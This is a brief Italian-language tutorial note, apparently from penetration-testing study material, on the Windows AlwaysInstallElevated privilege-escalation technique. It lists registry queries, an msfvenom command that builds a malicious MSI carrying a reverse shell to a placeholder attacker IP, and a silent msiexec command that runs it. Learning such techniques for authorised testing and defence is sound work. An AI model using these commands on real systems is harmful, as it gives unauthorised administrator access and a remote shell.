tags: AlwaysInstallElevated windows priv_esc


I file di installazione di Windows (noti anche come file .msi) vengono utilizzati per installare applicazioni sul sistema. Di solito vengono eseguiti con il livello di privilegio dell’utente che li avvia. Tuttavia, possono essere configurati per essere eseguiti con privilegi più elevati da qualsiasi account utente (anche quelli senza privilegi). Ciò potrebbe potenzialmente consentirci di generare un file MSI dannoso che verrebbe eseguito con privilegi di amministratore.

Questo metodo richiede l’impostazione di due valori di registro. Puoi interrogarli dalla riga di comando usando i comandi sottostanti:

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer 
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Per poter sfruttare questa vulnerabilità, entrambi devono essere impostati. Altrimenti, lo sfruttamento non sarà possibile. Se sono impostati, puoi generare un file .msi dannoso usando msfvenom, come mostrato di seguito:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Poiché si tratta di una reverse shell, dovresti anche eseguire il modulo Metasploit Handler configurato di conseguenza. Una volta trasferito il file che hai creato, puoi eseguire l’installer con il comando seguente e ricevere la reverse shell:

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi